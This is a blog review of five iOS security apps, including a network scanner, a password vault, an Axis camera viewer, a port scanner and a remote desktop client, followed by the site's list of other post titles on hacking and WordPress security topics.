Ever worry about having unwanted guests on your wireless network? Then Snap is an app for you. Just launch Snap, and it scans the network you're on to find what machines are connected to it. The results it returns include information about the manufacturer of the device it found, as well as what type of device it is and any other pertinent information. Snap is perfect for finding rogue users on your own network, as well as finding out who else is using a public network. Snap is available for $1.99 on the App Store.

SplashID

SplashID bills itself as a safe for the iPhone. The tool uses 256-bit encryption to store vital information such as passwords, but also lets you store even more critical information. Things such as credit card numbers, prescription numbers and more can be stored with SplashID. Other features of the app include anti-phishing icons to take you to the correct website every time, and a tab showing you your most frequently accessed records. The app costs a rather stiff $9.99, but for the added security it's worth it.

Viewer for Axis Cams

Viewer for Axis Cams gives users true home security no matter where they are. This app requires you to own at least one Axis surveillance camera. It can be configured to one camera, and it supports up to a hundred in case you have multiple cameras. The tool allows you to edit the settings on a camera, and also provides notifications in case a camera goes out. Available for $4.99 in the App Store, Viewer for Axis Cams is a necessity for owners of Axis cameras.

iPortScan

iPortScan lets you administrators check a known system to see what services are listening in. Essentially, it's a fast port scan that can be done from any mobile broadband connection. With the results of the port scan, administrators can be sure that nothing on the system is open unless it should be. As a $1.99 download from the App Store, its makers claim that it's a necessity for any security professional. With the features it provides at this price, it's hard to disagree.

Wyse PocketCloud

PocketCloud provides security in a number of ways. The app is used to remotely access a Windows or Mac desktop from any iOS device. This lets security administrators access network tools that are on their computer that aren't available on iOS. Even from a consumer perspective, PocketCloud gives users the ability to remotely access their computer to access any files on it, and it does this with SSL support for maximum security. You'll be able to make sure no one is accessing your computer that shouldn't be, and perform any security related functions from your computer as well. At $14.99, it's not for everyone, but those who buy it will certainly appreciate it.

Because the functions of these apps vary so greatly, one of them is bound to suit your needs. Give a couple of them a try and see how you like it. You just might turn your iOS device into a mobile security system.

Author

Tech writer EJ Parfitt has been writing for a short time now and has already picked up steam with several tech websites and local news sites . During his free time , you're sure to catch him competing in local chess tournaments in downtown Fort Lauderdale FL .

Ethical Hacking-Your Way To The World Of IT Security

Credentials Sniffing Psnuffle Metasploit Tutorial

Wordpress Security - Vulnerability Scanning

WordPress Security Audit & Vulnerability Scanning

Plecost WordPress Fingerprinting Tool:

Metasploit Meterpreter Scripting Backtrack 5 Tutorial

Screenspy Script

KillAv Script

Getcountermeasure Script

Gettelnet script

Checkvm- Check Virtual Machine

Virus Scan Bypass

Enable RDP- Getgui

Hashdump

Backup & Restore Your Wi-Fi Passwords

Windows 7

LastPass

1Password

SQLSentinel - SQL Injection Vulnerability Scanner

SQLSentinel Tutorial

Post Exploitation & Meterpreter Scripting -Metasploit

Post Exploitation

Subterfuge - Man-in-the-Middle Attack Framework Tutorial

How to Create a FUD Backdoor – Bypass An Antivirus

Result

AnonBin The Anonymous Alternate of Pastebin

PayPal & Wire Transfer Scam - Email Scam

Vulnerability Assessment & Scanning Nessus Tutorial

web-sorrow Web Server Scanner & Enumeration

usage:

EXAMPLES:

IT Auditing Fundamentals – Theoretical to Practical

Auditing Network Security

Vulnerability Assessment

Pentest.sh Penetration Testing Script for Backtrack 5

BackTrack 5 R2 – VirtualBox Guest Additions + USB Issues Fixes

Download and Install

Solution

Solution

About the Author

Bugtraq-I Distribution for Pentesting & Forensics

WIRELESS AND BLUETOOH SUPPORTED PATCHES

Spy Softwares Keyloggers & RAT Review

AllIn One Keylogger

Download

SniperSpy Remote Spy Software

NetSpy Pro

How to Create a Fake Access Point Backtrack 5

Wordpress Security & Vulnerability Scanning Services

Wordpress Security Audit

Wordpress Security Shield

Wordpress Bullet Proof Security

Wordpress Secure Installation & Security Configuration

Hacked Wordpress Website Recovery

The Mole(SQL Injection exploitation tool) v0.3 released

Features

Current Release: v0.3 (2012-03-02)

Current Bug-Free version

The Mole SQLi Exploitation Tool Tutorial

Backtrack 5 R2 Release - Update to Backtrack 5 R2

DPScan Drupal Security Scanner Tutorial

How to Hack Linux -Metasploit Tutorial Backtrack 5 R1

Protecting Your Wifi-Connections - ISPs are not Your Mothers

Top Security Apps for iOS

Snap

SplashID

Viewer for Axis Cams

iPortScan

Wyse PocketCloud